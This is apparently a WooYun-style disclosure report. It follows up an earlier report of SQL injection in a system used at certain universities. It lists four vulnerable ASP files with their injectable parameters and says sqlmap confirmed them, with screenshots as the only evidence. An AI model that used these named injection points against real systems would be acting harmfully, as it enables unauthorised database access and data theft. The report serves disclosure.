### Brief description:
··
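### Details:
[WooYun: SQL injection in a system in use at certain universities (bundle) (DBA) (no login required) 2](http://www.wooyun.org/bugs/wooyun-2015-0101213)
The previous report.
Injection file and parameter: language.asp, editLangCode
Cases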
The first two were run through sqlmap:
![Screenshot (1112).png](https://images.seebug.org/upload/201504/041851343cf6a5757f52e1e83706dac91dc10678.png)
![Screenshot (1113).png](https://images.seebug.org/upload/201504/04185144b366fa2dae4234a1e108e5508d67d51d.png)
![Screenshot (1114).png](https://images.seebug.org/upload/201504/04185231b8f5edcb4d537406c8313762bd520c99.png)
![Screenshot (1115).png](https://images.seebug.org/upload/201504/04185239dec97486c043b0e338b557d5efee32f2.png)
Injection file and parameter: tutordept.asp, txtDeptName
Cases
The first two were run through sqlmap:
![Screenshot (1116).png](https://images.seebug.org/upload/201504/0419010739e59103d36633cfb31c9f6c5737982a.png)
![Screenshot (1117).png](https://images.seebug.org/upload/201504/04190117d4641a3c44b7055a5420da3f4cde304c.png)
![Screenshot (1118).png](https://images.seebug.org/upload/201504/04190126b7ba66013207a6b8a9def0a9e997bfd4.png)
Injection file and parameter: subject.asp, editSClassName
Cases
The first two were run through sqlmap:
![Screenshot (1119).png](https://images.seebug.org/upload/201504/04192235413653ae4f69cc595ba862b940f37249.png)
![Screenshot (1120).png](https://images.seebug.org/upload/201504/04192244d3456e6eca685704a783a1336f4c8e66.png)
![Screenshot (1121).png](https://images.seebug.org/upload/201504/041922522d2be922a362bc9e39bcc0bf71e49155.png)
![Screenshot (1122).png](https://images.seebug.org/upload/201504/0419230312a643d3f6632594824f02c61c5e890e.png)
Injection file and parameter: usermng.asp, txtLogin
Cases
sqlmap results for the first two:
![Screenshot (1123).png](https://images.seebug.org/upload/201504/04193148feadca08d83596fd8f27294f56933afa.png)
![Screenshot (1124).png](https://images.seebug.org/upload/201504/041931570a26b5cc71377629b4ccfe084d343fd7.png)
![Screenshot (1125).png](https://images.seebug.org/upload/201504/041932073d03004b0135a00b60bc335a8304ed1e.png)
![Screenshot (1126).png](https://images.seebug.org/upload/201504/0419321742a68715c04d6d14b4ead2ff9dfcf2b3.png)
### Proof of vulnerability:
···